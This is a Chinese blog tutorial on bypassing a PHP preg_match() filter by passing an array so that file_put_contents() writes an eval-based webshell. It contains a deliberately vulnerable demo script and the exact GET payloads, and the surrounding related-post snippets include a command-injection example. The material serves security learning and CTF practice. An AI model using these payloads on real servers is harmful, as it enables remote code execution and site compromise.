file_put_contents() 利用技巧

已于 2022-03-05 13:49:16 修改
阅读量4.1k 收藏 2
点赞数
分类专栏: Web安全 文章标签: php web 安全
于 2021-11-08 17:00:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927266/article/details/121210295
版权

0x00 Preface

0x01 file_put_contents()

在这里插入图片描述

参数 data 为要写入的数据,类型可以是 string、array 或 stream。如果 data 为 stream,就相当于使用 stream_copy_to_stream() 函数,stream 中保存的缓存数据将被写入到指定文件中。如果 data 为数组(但不能为多维数组),就相当于使用 file_put_contents($filename, join("", $array)),将数据转换为字符串后写入。

0x02 preg_match()

对于用户可控的输入,大多都通过正则对敏感字符进行过滤:

if(preg_match('/\</',$data)){
 die('hack');
}

0x03 Bypass preg_match()

很多以字符串为参数的函数如果传入数组则会报错并返回 null, 如 strcmp()、strlen()、md5() 等。但 preg_match() 函数传入数组时报错返回的是 false,这样以来 preg_match() 函数的正则过滤就失效了,并且不会改变原数据的内容。这里我们可以通过 var_dump(preg_match('/\</',$data)); 来验证。

<?php 
  
if(isset($_GET['content']) && isset($_GET['ext'])){
 $data = $_GET['content'];
 $ext = $_GET['ext'];
  
 var_dump(preg_match('/\</',$data));
 if(preg_match('/\</',$data)){
  die('<br>hack');
 }
 $filename = time();
 file_put_contents($filename.$ext, $data);
}
  
?>

content=123&ext=.txt
在这里插入图片描述
在这里插入图片描述

content=<?php%20@eval($_POST[%27a%27]);%20?>&ext=.php
在这里插入图片描述

content[]=<?php%20@eval($_POST[%27a%27]);%20?>&ext=.php

在这里插入图片描述
在这里插入图片描述

0x04 Reference

https://www.jb51.net/article/127521.htm

iO快到碗里来
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
file_get_contents()和file_put_contents() 的用法
qq_36627117的博客
07-01 3297
1、file_get_contents() 函数把整个文件读入一个字符串中。 file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。 file_get_contents(path,include_path,context,start,max_length) 参数 描述 path 必需。规定要读取的文件。 include_path 可选。如果也想在 include_path 中搜寻文件的话
PHP中fwrite与file_put_contents性能测试代码
10-27
里测试的是往文件中写一百万行记录,如果数据量很小,比如1000条左右的记录,可能差距不大
php file_put_contents不能写入问题
afterlife_union的博客
08-31 4376
原因 1、没有文件、目录权限 2、php.ini中 open_basedir 进行了限制 open_basedir 可将用户访问文件的活动范围限制在指定的区域, 假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。 注意用open_basedir指定的限制实际上是前缀,而不是目录名。 例如,“open_basedir = /dir/u
file_put_contents函数常用方法
fjnjxr的博客|PHP每周一贴
08-25 2647
1、file_put_contents (PHP 5, PHP 7) file_put_contents — 将一个字符串写入文件 int file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) 和依次调用 fopen()
file_put_contents失败,返回false的几种情况和解决方案
qq_35641923的博客
06-29 5627
记一下踩的坑吧,如果有遇到file_put_contents失败的,希望这个帮助到你。 一、权限不足 不足就给权限,chmod -R 777 file 网上的解决方法大部分是这个,这小问题,一般这种问题也不用网上查 二、没有创建目录 文档里说是可以自动创建文件,但文件的上级目录不存在时,却不会自动创建,创建下给个权限就解决了 三、磁盘空间不足 这个就很坑了,还没有提示,网上找失败原因也没找到,太难想到了,解决方法就是清理下磁盘内容,或者扩容 ...
PHP file_put_contents() 函数
子非鱼的博客
07-04 6533
定义和用法file_put_contents()函数把一个字符串写入文件中。该函数访问文件时,遵循以下规则:如果设置了FILE_USE_INCLUDE_PATH,那么将检查* filename *副本的内置路径如果文件不存在,将创建一个文件打开文件如果设置了LOCK_EX,那么将锁定文件如果设置了FILE_APPEND,那么将移至文件末尾。否则,将会清除文件的内容向文件中写入数据关闭文件并对所有文...
fileputcontents php,PHP中危险的file_put_contents函数详解
weixin_42592399的博客
03-11 826
前言最近在EIS上遇到一道文件上传的题,发现过滤了来看下file_put_contents函数第二个参数data的官网定义:data要写入的数据。类型可以是 string,array 或者是 stream 资源(如上面所说的那样)。如果 data 指定为 stream 资源,这里 stream 中所保存的缓存数据将被写入到指定文件中,这种用法就相似于使用 stream_copy_to_stream...
centos下file_put_contents()无法写入文件的原因及解决方法
10-20
下面小编就为大家带来一篇centos下file_put_contents()无法写入文件的原因及解决方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PHPfile_put_contents追加和换行的实现方法
01-20
可以使用fopen(),fwrite()以及 fclose()这些进行操作。也可以简单的使用file_get_contents()和file_put_contents(). file_put_contents()写文件。默认的是重新写文件,也...int file_put_contents
关于file_put_contents的一些小测试1
08-03
在上述描述中,提到了利用`file_put_contents`绕过限制的情况,主要涉及到编码和过滤器策略。 - **Base64编码**:通过Base64编码,可以将`();`转换为PHP无法识别的字符序列,同时确保Webshell的Base64内容正常解码...
file_put_contents
07-27
file_put_contents的使用说明
PHP中危险的file_put_contents函数详解
12-19
由于 `file_put_contents` 允许数组作为 `$data` 参数,攻击者可以利用数组绕过基于字符串的过滤。而 `fwrite` 函数则只接受字符串,传入数组会导致错误,因此使用 `fwrite` 可以提高安全性。 ```php $f = fopen($...
ctfshow 其他
qq_45951598的博客
01-11 3197
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
php格式化写入文件,PHP格式化输出日志到文件
weixin_32328999的博客
03-11 197
if (!function_exists("print_log")) {function print_log($data, $is_pretty = 1){$log_dir = "./log" . "/" . date("Ym");if (!is_dir($log_dir)) {mkdir($log_dir, 0777, true);}$file = date("d") . ".log";$ct ...
file_put_contents () failed to open stream: Permission denied 解决办法
lxw1844912514的博客
03-31 9235
今天,帮朋友配置服务器thinkphp5的时候,直接访问“www.***.com/admin/index/index”; 出现以下错误: file_put_contents(/PHP/admin/tp/runtime/temp/71dafaa2a0ea0d586666de9d67f301a7.php)failedtoopenstream:Permissiond...
thinkphp6.0 使用 topthink/queue 3.0
最新发布
kjkjk6556456的博客
06-13 222
安装 composer require topthink/think-queue ^3.0。安装 redis 需要在phpinfo()看见这个配置。echo '加入队列成功';* task具体执行逻辑。
【Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5667
ctf命令执行题型解题方法汇总(持续更新中)
php把提交的数据写入到配置文件中
zxh7770的博客
09-24 1591
php把提交的数据写入到配置文件中 在后台可以设置网站的基本信息,例如:title,keywords,copyright。等信息,这些信息只是一条数据,存入数据库耗费资源,直接写入到php文件中。 创建php文件。方便写入 我用的是laravel框架,在F:\project\redshop\resources\views\admin\set\system\website.blade.php,编辑w...
php file_put_contents写入文件
05-31
`file_put_contents` 是 PHP 内置的函数,可以用来将内容写入文件。下面是使用 `file_put_contents` 写入文件的示例代码: ```php <?php // 写入的内容 $content = "Hello, World!\n"; // 设置保存文件的路径和名称 $file_path = "/path/to/save/file.txt"; // 将内容写入文件 file_put_contents($file_path, $content, FILE_APPEND); ?> ``` 这段代码可以将指定的内容写入到文件中。你需要将 `$content` 替换为你需要写入的内容,将 `$file_path` 替换为你需要保存的文件路径和名称。如果需要追加内容到文件末尾,需要在 `file_put_contents` 函数的第三个参数中指定 `FILE_APPEND`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值